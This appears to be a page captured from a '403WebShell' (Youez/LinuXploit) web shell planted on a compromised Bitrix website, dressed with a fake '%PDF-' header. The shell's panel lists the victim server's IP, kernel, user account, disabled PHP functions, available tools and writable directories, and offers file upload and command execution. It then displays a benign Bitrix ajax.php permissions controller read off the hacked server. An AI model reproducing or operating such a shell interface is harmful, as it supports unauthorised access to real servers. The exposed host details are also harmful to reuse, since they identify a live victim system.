%PDF- %PDF- 403WebShell
403Webshell
Server IP : 37.220.80.31  /  Your IP : 3.129.194.180
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux 3051455-guretool.twc1.net 5.15.0-107-generic #117-Ubuntu SMP Fri Apr 26 12:26:49 UTC 2024 x86_64
User : www-root ( 1010)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/www-root/data/www/dev.artlot24.ru/bitrix/components/bitrix/sender.config.role.edit/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/www-root/data/www/dev.artlot24.ru/bitrix/components/bitrix/sender.config.role.edit//ajax.php
<?php
define('STOP_STATISTICS', true);
define('BX_SECURITY_SHOW_MESSAGE', true);

require_once($_SERVER['DOCUMENT_ROOT'].'/bitrix/modules/main/include/prolog_before.php');

use Bitrix\Main\Localization\Loc;
use Bitrix\Sender\Access\AccessController;
use Bitrix\Sender\Access\ActionDictionary;
use Bitrix\Sender\Access\Service\RolePermissionService;
use Bitrix\Sender\Security;
use Bitrix\Sender\Security\User;

if (!Bitrix\Main\Loader::includeModule('sender'))
{
	return;
}

class ConfigRoleEditSenderAjaxController extends \Bitrix\Main\Engine\Controller
{
	public function savePermissionsAction(array $userGroups, array $parameters)
	{

		if (!Security\Role\Manager::canUse())
		{
			return;
		}

		if(!AccessController::can(
			User::current()->getId(),
			ActionDictionary::ACTION_SETTINGS_EDIT
		))
		{
			return;
		}

		if (!is_array($userGroups) || empty($userGroups) || !check_bitrix_sessid())
		{
			return;
		}

		try
		{
			$permissionService = new RolePermissionService();

			$dealCategoryId = $parameters['dealCategoryId'] ?? 0;
			$permissionService
				->saveRolePermissions($userGroups, $dealCategoryId);

			(new \Bitrix\Sender\Access\Service\RoleRelationService())
				->saveRoleRelation($userGroups);

			return [
				'USER_GROUPS' => $permissionService->getUserGroups($dealCategoryId),
				'ACCESS_RIGHTS' => $permissionService->getAccessRights()
			];
		}
		catch (\Exception $e)
		{
			$this->errorCollection[] = new \Bitrix\Main\Error(Loc::getMessage('SENDER_CONFIG_PERMISSIONS_DB_ERROR'));
		}
	}

	public function deleteRoleAction(int $roleId)
	{
		if(!AccessController::can(
			User::current()->getId(),
			ActionDictionary::ACTION_SETTINGS_EDIT
		))
		{
			return;
		}

		if (!is_int($roleId) || !check_bitrix_sessid())
		{
			return;
		}

		try
		{
			(new RolePermissionService())->deleteRole($roleId);
		}
		catch (\Bitrix\Main\DB\SqlQueryException $e)
		{
			$this->errorCollection[] = new \Bitrix\Main\Error(
				Loc::getMessage('SENDER_CONFIG_ROLE_DELETE_DB_ERROR')
			);
		}
	}

	/**
	 *
	 * @param array $parameters
	 *
	 * @return array
	 */
	public function loadAction(array $parameters)
	{
		$dealCategoryId = $parameters['dealCategoryId'] ?? 0;
		$permissionService = new RolePermissionService();

		return [
			'USER_GROUPS' => $permissionService->getUserGroups($dealCategoryId),
			'ACCESS_RIGHTS' => $permissionService->getAccessRights()
		];
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit